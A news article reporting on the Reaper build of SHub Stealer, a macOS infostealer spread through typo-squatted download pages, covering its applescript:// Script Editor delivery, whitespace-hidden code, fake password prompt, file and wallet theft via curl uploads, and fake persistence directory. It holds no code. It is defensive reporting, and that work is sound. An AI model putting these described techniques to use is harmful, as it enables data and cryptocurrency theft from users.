macOS users are facing another malware campaign, this time involving a modified infostealer that poses as trusted technology brands to compromise local files and cryptocurrency assets.
As previously reported by Hackread.com, researchers at SentinelOne first identified the campaign distributing an updated version of SHub Stealer under the build tag Reaper. A later investigation by Moonlock has now provided more detail on the operation, showing how attackers used fake download pages for popular apps such as WeChat and Miro to target victims.
The Automated ClickFix Technique
According to Moonlock’s blog post, this campaign uses a variant of the ClickFix attack. In previous iterations, threat actors used deceptive web pages to convince victims to manually copy and paste malicious commands into the native macOS Terminal utility. To neutralise this specific risk, Apple implemented strict copy-and-paste restrictions within Terminal inside the macOS Tahoe 26.4 operating system release.
To bypass these updates, the Reaper malware abandons the Terminal entirely, and the fake websites use a specific internet link format (applescript://) to automatically open the built-in macOS Script Editor app. The hackers hide the malicious code inside the app by using extensive ASCII art and arbitrary whitespace injection to obfuscate the functional script sequences below the visible scroll boundary of the graphical user interface.
This basically pushes the command out of sight. When a user clicks the play button, thinking they are running a normal system update, the script executes. Because Script Editor is an official tool included with all versions of macOS, users rarely suspect any danger.
Multi-Stage Disguises and Data Theft
The attackers use a shifting setup to gain user trust. The attack starts on fake software pages hosted on misspelled Microsoft web domains, such as mlcrosoft.co.com. Once the script runs, it displays a fake Apple security update message to trick the user into typing in their system password.
“The payload may be hosted on a typo-squatted Microsoft domain, executed under the guise of an Apple security update, and persist from a fake Google Software Update directory. Alongside the previously documented SHub feature set, the build also adds an AMOS-style document theft module with chunked uploads,” researchers explained.
Reaper then checks the computer’s keyboard configuration. If the keyboard is set to the Russian language, the program completely shuts down. If not, it activates an information-stealing feature modelled after Atomic macOS Stealer (AMOS).
It targets specific extensions within the Desktop and Documents paths, specifically storing .docx, .pdf, .xlsx, .wallet, and .keys files into compressed 70MB chunked ZIP archives. These archives are transmitted via standard curl commands to an external command-and-control server at hebsbsbzjsjshduxbs.xyz/gate/chunk.
The malware also targets internet browsers like Chrome, Firefox, and Edge to steal saved passwords, along with browser extensions like 1Password and MetaMask. For desktop crypto wallets, including Ledger Live, Trezor Suite, and Exodus, Reaper modifies the actual internal code of the applications to intercept and divert future funds. Finally, it sets up a permanent backdoor inside a fake Google Software Update directory to maintain remote access to the computer.
This is the third campaign in under two months that has adopted this newly automated distribution style. Therefore, researchers are advising to always double check website addresses, never type your Mac password into unexpected pop-up boxes, and use reliable security software to detect these hidden scripts before execution to stay safe.
